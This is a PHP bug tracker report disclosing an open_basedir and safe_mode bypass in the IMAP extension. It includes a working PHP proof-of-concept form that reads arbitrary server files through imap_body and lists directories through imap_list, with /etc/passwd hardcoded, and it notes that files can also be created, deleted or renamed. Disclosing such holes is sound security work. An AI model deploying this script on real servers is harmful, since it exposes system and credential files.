From: Challii at btinternet dot com Operating system: RHE3 PHP version: 4.4.2 PHP Bug Type: IMAP related Bug description: imap_body able to bypass php_openbasedir
Description: ------------ Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open could be used to open stream to local files. For php and imap module imap_open allow to bypass safemode and open_basedir restrictions. Use imap_body or others to view a file and imap_list to recursively list a directory. s/mailbox/file :) imap_createmailbox imap_deletemailbox imap_renamemailbox to create,delete,rename files with apache privileges. Reproduce code: --------------- ##### code ##### <form action="" method="post"> <select name="switch"> <option selected="selected" value="file">View file</option> <option value="dir">View dir</option> </select> <input type="text" size="60" name="string"> <input type="submit" value="go"> </form> <?php $string = !empty($_POST['string']) ? $_POST['string'] : 0; $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0; if ($string && $switch == "file") { $stream = imap_open($string, "", ""); if ($stream == FALSE) die("Can't open imap stream"); $str = imap_body($stream, 1); if (!empty($str)) echo "<pre>".$str."</pre>"; imap_close($stream); } elseif ($string && $switch == "dir") { $stream = imap_open("/etc/passwd", "", ""); if ($stream == FALSE) die("Can't open imap stream"); $string = explode("|",$string); if (count($string) > 1) $dir_list = imap_list($stream, trim($string[0]), trim($string[1])); else $dir_list = imap_list($stream, trim($string[0]), "*"); echo "<pre>"; for ($i = 0; $i < count($dir_list); $i++) echo "$dir_list[$i]\n"; echo "</pre>"; imap_close($stream); } ?> ################ Expected result: ---------------- That the file could not be accessed due to a security permission Actual result: -------------- The ability to see any file on the server. -- Edit bug report at http://bugs.php.net/?id=37265&edit=1 -- Try a CVS snapshot (PHP 4.4): http://bugs.php.net/fix.php?id=37265&r=trysnapshot44 Try a CVS snapshot (PHP 5.1): http://bugs.php.net/fix.php?id=37265&r=trysnapshot51 Try a CVS snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=37265&r=trysnapshot60 Fixed in CVS: http://bugs.php.net/fix.php?id=37265&r=fixedcvs Fixed in release: http://bugs.php.net/fix.php?id=37265&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=37265&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=37265&r=needscript Try newer version: http://bugs.php.net/fix.php?id=37265&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=37265&r=support Expected behavior: http://bugs.php.net/fix.php?id=37265&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=37265&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=37265&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=37265&r=globals PHP 3 support discontinued: http://bugs.php.net/fix.php?id=37265&r=php3 Daylight Savings: http://bugs.php.net/fix.php?id=37265&r=dst IIS Stability: http://bugs.php.net/fix.php?id=37265&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=37265&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=37265&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=37265&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=37265&r=mysqlcfg